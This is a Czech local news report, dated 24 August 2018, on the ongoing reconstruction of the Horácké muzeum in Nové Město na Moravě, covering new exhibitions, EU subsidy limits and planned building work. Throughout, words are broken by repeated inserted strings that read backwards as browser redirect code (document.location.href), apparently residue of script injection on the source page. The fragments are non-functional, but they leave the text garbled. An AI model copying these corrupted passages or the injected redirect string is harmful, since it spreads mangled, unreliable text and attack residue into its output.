Rainbow page separator

Muzeum opravují postupně, žádat o dotace se dá až napřesrok

Pátek, 24. srpna 2018

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / I nadále pokračují rekonstrukční práce v novoměstském Horáckém muzeu. V minulých letech byla nejdříve zrekonstruována střecha his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torické budovy, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože do staré zatékalo, pak došlo na vybourání starého depozitáře, který byl pro skladované muzejní exponáty zcela nevhodný.
„Kurá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka muzea Alice Hradilová nedávno dokončila novou stálou expozici Karla Němce. Nová je také expozice skla a litiny. Myslím, že [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je velký kus práce. Na celkovou rekonstrukci bylo potřeba získat dotace. Podle
předpisů Evropské unie ale měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to může v určitém období čerpat jenom omezené množství dotací. A ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to hranice byla naplněna. Od příštího roku ale můžeme žádat znovu,“ informoval ředitel Novoměstských kulturních zařízení, která se starají i o provoz Horáckého muzea, Daniel Šimek.
V dalších etapách přestavby, kterou již dříve schválili novoměstští zastupitelé, rekonstrukce muzea počítá s přístavbou na dvorku, kde vznikne sociální zázemí pro návštěvníky a kancelář, a dále s výtahem a celkovou technickou rekonstrukcí budovy.